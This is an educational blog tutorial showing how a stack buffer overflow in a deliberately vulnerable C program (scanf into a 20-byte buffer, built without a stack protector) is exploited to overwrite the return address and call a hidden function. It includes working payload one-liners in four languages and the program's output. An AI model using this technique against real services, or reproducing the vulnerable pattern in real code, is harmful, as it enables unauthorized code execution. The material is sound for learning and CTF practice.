Apr 3, 2015 • Dhaval Kapil
I am interested in exploiting binary files. The first time I came across the buffer overflow
exploit, I couldn’t actually implement it. Many of the existing sources on the web were outdated(worked with earlier versions of gcc, linux, etc). It took me quite a while to actually run a vulnerable program on my machine and exploit it.
I decided to write a simple tutorial for beginners or people who have just entered the field of binary exploits.
This tutorial will be very basic. We will simply exploit the buffer by smashing the stack and modifying the return address of the function. This will be used to call some other function. You can also use the same technique to point the return address to some custom code that you have written, thereby executing anything you want(perhaps I will write another blog post regarding shellcode injection).
- I assume people to have basic-intermediate knowledge of
C
. - They should be a little familiar with
gcc
and the linux command line. - Basic x86 assembly language.
This tutorial is specifically written to work on the latest distro’s of linux
. It might work on older versions. Similar is the case for gcc
. We are going to create a 32 bit binary, so it will work on both 32 and 64 bit systems.
#include <stdio.h>
void secretFunction()
{
printf("Congratulations!\n");
printf("You have entered in the secret function!\n");
}
void echo()
{
char buffer[20];
printf("Enter some text:\n");
scanf("%s", buffer);
printf("You entered: %s\n", buffer);
}
int main()
{
echo();
return 0;
}
Now this programs looks quite safe for the usual programmer. But in fact we can call the secretFunction
by just modifying the input. There are better ways to do this if the binary is local. We can use gdb
to modify the %eip
. But in case the binary is running as a service on some other machine, we can make it call other functions or even custom code by just modifying the input.
Let’s start by first examining the memory layout of a C program, especially the stack, it’s contents and it’s working during function calls and returns. We will also go into the machine registers esp
, ebp
, etc.
Source: http://i.stack.imgur.com/1Yz9K.gif
-
Command line arguments and environment variables: The arguments passed to a program before running and the environment variables are stored in this section.
-
Stack: This is the place where all the function parameters, return addresses and the local variables of the function are stored. It’s a
LIFO
structure. It grows downward in memory(from higher address space to lower address space) as new function calls are made. We will examine the stack in more detail later. -
Heap: All the dynamically allocated memory resides here. Whenever we use
malloc
to get memory dynamically, it is allocated from the heap. The heap grows upwards in memory(from lower to higher memory addresses) as more and more memory is required. -
Uninitialized data(Bss Segment): All the uninitialized data is stored here. This consists of all global and static variables which are not initialized by the programmer. The kernel initializes them to arithmetic 0 by default.
-
Initialized data(Data Segment): All the initialized data is stored here. This constists of all global and static variables which are initialised by the programmer.
-
Text: This is the section where the executable code is stored. The
loader
loads instructions from here and executes them. It is often read only.
-
%eip: The Instruction pointer register. It stores the address of the next instruction to be executed. After every instruction execution it’s value is incremented depending upon the size of an instrution.
-
%esp: The Stack pointer register. It stores the address of the top of the stack. This is the address of the last element on the stack. The stack grows downward in memory(from higher address values to lower address values). So the
%esp
points to the value in stack at the lowest memory address. -
%ebp: The Base pointer register. The
%ebp
register usually set to%esp
at the start of the function. This is done to keep tab of function parameters and local variables. Local variables are accessed by subtracting offsets from%ebp
and function parameters are accessed by adding offsets to it as you shall see in the next section.
Consider the following piece of code:
void func(int a, int b)
{
int c;
int d;
// some code
}
void main()
{
func(1, 2);
// next instruction
}
Assume our %eip
is pointing to the func
call in main
. The following steps would be taken:
- A function call is found, push parameters on the stack from right to left(in reverse order). So
2
will be pushed first and then1
. - We need to know where to return after
func
is completed, so push the address of the next instruction on the stack. - Find the address of
func
and set%eip
to that value. The control has been transferred tofunc()
. - As we are in a new function we need to update
%ebp
. Before updating we save it on the stack so that we can return later back tomain
. So%ebp
is pushed on the stack. - Set
%ebp
to be equal to%esp
.%ebp
now points to current stack pointer. - Push local variables onto the stack/reserver space for them on stack.
%esp
will be changed in this step. - After
func
gets over we need to reset the previous stack frame. So set%esp
back to%ebp
. Then pop the earlier%ebp
from stack, store it back in%ebp
. So the base pointer register points back to where it pointed inmain
. - Pop the return address from stack and set
%eip
to it. The control flow comes back tomain
, just after thefunc
function call.
This is how the stack would look while in func
.
Buffer overflow is a vulnerability in low level codes of C and C++. An attacker can cause the program to crash, make data corrupt, steal some private information or run his/her own code.
It basically means to access any buffer outside of it’s alloted memory space. This happens quite frequently in the case of arrays. Now as the variables are stored together in stack/heap/etc. accessing any out of bound index can cause read/write of bytes of some other variable. Normally the program would crash, but we can skillfully make some vulnerable code to do any of the above mentioned attacks. Here we shall modify the return address and try to execute the return address.
Here is the link to the above mentioned code. Let’s compile it.
For 32 bit systems
gcc vuln.c -o vuln -fno-stack-protector
For 64 bit systems
gcc vuln.c -o vuln -fno-stack-protector -m32
-fno-stack-protector
disabled the stack protection. Smashing the stack is now allowed. -m32
made sure that the compiled binary is 32 bit. You may need to install some additional libraries to compile 32 bit binaries on 64 bit machines. You can download the binary generated on my machine here.
You can now run it using ./vuln
.
Enter some text:
HackIt!
You entered: HackIt!
Let’s begin to exploit the binary. First of all we would like to see the disassembly of the binary. For that we’ll use objdump
objdump -d vuln
Running this we would get the entire disasembly. Let’s focus on the parts that we are interested in. (Note however that your output may vary)
-
The address of
secretFunction
is0804849d
in hex.0804849d <secretFunction>:
-
38 in hex or 56 in decimal
bytes are reserved for the local variables ofecho
function.80484c0: 83 ec 38 sub $0x38,%esp
-
The address of
buffer
starts1c in hex or 28 in decimal
bytes before%ebp
. This means that 28 bytes are reserved forbuffer
even though we asked for 20 bytes.80484cf: 8d 45 e4 lea -0x1c(%ebp),%eax
Now we know that 28 bytes are reserved for buffer
, it is right next to %ebp
(the Base pointer of the main
function). Hence the next 4 bytes will store that %ebp
and the next 4 bytes will store the return address(the address that %eip
is going to jump to after it completes the function). Now it is pretty obvious how our payload would look like. The first 28+4=32 bytes would be any random characters and the next 4 bytes will be the address of the secretFunction
.
Note: Registers are 4 bytes or 32 bits as the binary is compiled for a 32 bit system.
The address of the secretFunction
is 0804849d
in hex. Now depending on whether our machine is little-endian or big-endian we need to decide the proper format of the address to be put. For a little-endian machine we need to put the bytes in the reverse order. i.e. 9d 84 04 08
. The following scripts generate such payloads on the terminal. Use whichever language you prefer to:
ruby -e 'print "a"*32 + "\x9d\x84\x04\x08"'
python -c 'print "a"*32 + "\x9d\x84\x04\x08"'
perl -e 'print "a"x32 . "\x9d\x84\x04\x08"'
php -r 'echo str_repeat("a",32) . "\x9d\x84\x04\x08";'
Note: we print \x9d because 9d was in hex
You can pipe this payload directly into the vuln
binary.
ruby -e 'print "a"*32 + "\x9d\x84\x04\x08"' | ./vuln
python -c 'print "a"*32 + "\x9d\x84\x04\x08"' | ./vuln
perl -e 'print "a"x32 . "\x9d\x84\x04\x08"' | ./vuln
php -r 'echo str_repeat("a",32) . "\x9d\x84\x04\x08";' | ./vuln
This is the output that I get:
Enter some text:
You entered: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<rubbish 3 bytes>
Congratulations!
You have entered in the secret function!
Illegal instruction (core dumped)
Cool! we were able to overflow the buffer and modify the return address. The secretFunction
got called. But this did foul up the stack as the program expected secretFunction
to be present.
- gets
- scanf
- sprintf
- strcpy
Whenever you are using buffers, be careful about their maximum length. Handle them appropriately.
While managing BackdoorCTF I devised a simple challenge based on this vulnerability. Here. See if you can solve it!